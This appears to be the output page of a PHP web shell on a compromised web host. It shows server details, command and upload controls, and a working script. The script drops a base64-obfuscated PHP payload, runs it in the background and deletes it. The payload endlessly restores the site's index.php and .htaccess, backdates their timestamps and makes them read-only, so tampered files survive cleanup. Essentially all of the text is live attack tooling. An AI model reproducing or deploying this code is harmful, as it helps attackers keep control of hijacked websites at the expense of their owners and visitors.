|
Server IP : 103.49.131.241 / Your IP : 216.73.216.234 Web Server : LiteSpeed System : Linux cpindia.liteserverdns.in 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64 User : flightsc ( 2923) PHP Version : 8.2.29 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /tmp/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
function i($i)
{
echo '{->|' . $i . '|<-}';
}
function getPhpPath()
{
ob_start();
phpinfo(1);
$info = ob_get_contents();
ob_end_clean();
preg_match("/--bindir=([^&]+)/si", $info, $matches);
if (isset($matches[1]) && $matches[1] != '') {
return $matches[1] . '/php';
}
preg_match("/--prefix=([^&]+)/si", $info, $matches);
if (!isset($matches[1])) {
return 'php';
}
return $matches[1] . '/bin/php';
}
function run($code, $method = 'popen')
{
$disabled = explode(',', ini_get('disable_functions'));
if (in_array($method, $disabled)) {
$method = 'exec';
}
if (in_array($method, $disabled)) {
return false;
}
$result = '';
switch ($method){
case 'exec':
exec($code,$array);
foreach ($array as $key => $value) {
$result .= $key . " : " . $value . PHP_EOL;
}
return $result;
break;
case 'popen':
$fp = popen($code,"r");
while (!feof($fp)) {
$out = fgets($fp, 4096);
$result .= $out;
}
pclose($fp);
return $result;
break;
default:
return false;
break;
}
}
$disabled = explode(',', ini_get('disable_functions'));
if (in_array("exec", $disabled) && in_array("popen", $disabled))
{
i("failed");
}
else
{
$php_path = getPhpPath();
$script_path = "/home/flightsc/volbasprix.com" . "/l.php";
$script_content = base64_decode('JGluZGV4X3BhdGggPSBfX0RJUl9fIC4iL2luZGV4LnBocCI7CiAgICAkaW5kZXhfY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRpbmRleF9wYXRoKTsKICAgICRpbmRleF9tZDUgPSBtZDUoJGluZGV4X2NvbnRlbnQpOwogICAgJGh0YWNjZXNzX3BhdGggPSBfX0RJUl9fIC4iLy5odGFjY2VzcyI7CiAgICAkaHRhY2Nlc3NfY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCRodGFjY2Vzc19wYXRoKTsKICAgICRodGFjY2Vzc19tZDUgPSBtZDUoJGh0YWNjZXNzX2NvbnRlbnQpOwoKICAgIHdoaWxlICh0cnVlKQogICAgewogICAgICAgICR0ZW1wX21kNSA9IEBtZDUoZmlsZV9nZXRfY29udGVudHMoJGluZGV4X3BhdGgpKTsKICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKCRpbmRleF9wYXRoKSAgfHwgJHRlbXBfbWQ1ICE9ICRpbmRleF9tZDUpIHsKICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCRpbmRleF9wYXRoLCAkaW5kZXhfY29udGVudCk7CiAgICAgICAgICAgIEB0b3VjaCgkaW5kZXhfcGF0aCwgc3RydG90aW1lKCItNDAwIGRheXMiLCB0aW1lKCkpKTsKICAgICAgICAgICAgQGNobW9kKCRpbmRleF9wYXRoLCAwNDQ0KTsKICAgICAgICB9CiAgICAgICAgJHRlbXBfbWQ1ID0gQG1kNShmaWxlX2dldF9jb250ZW50cygkaHRhY2Nlc3NfcGF0aCkpOwogICAgICAgIGlmICghZmlsZV9leGlzdHMoJGh0YWNjZXNzX3BhdGgpIHx8ICR0ZW1wX21kNSAhPSAkaHRhY2Nlc3NfbWQ1KSB7CiAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygkaHRhY2Nlc3NfcGF0aCwgJGh0YWNjZXNzX2NvbnRlbnQpOwogICAgICAgICAgICBAdG91Y2goJGh0YWNjZXNzX3BhdGgsIHN0cnRvdGltZSgiLTQwMCBkYXlzIiwgdGltZSgpKSk7CiAgICAgICAgICAgIEBjaG1vZCgkaHRhY2Nlc3NfcGF0aCwgMDQ0NCk7CiAgICAgICAgfQogICAgICAgIHNsZWVwKDEpOwogICAgfQ==');
$script_content = "<?php unlink('$script_path');" . str_replace('__DIR__', "'" . __DIR__ . "'", $script_content);
@file_put_contents($script_path, $script_content);
$code = "nohup $php_path " . $script_path . ' ' . base64_decode('Pi9kZXYvbnVsbCAyPiYxICY=');
run($code);
sleep(2);
@unlink($script_path);
i('success');
}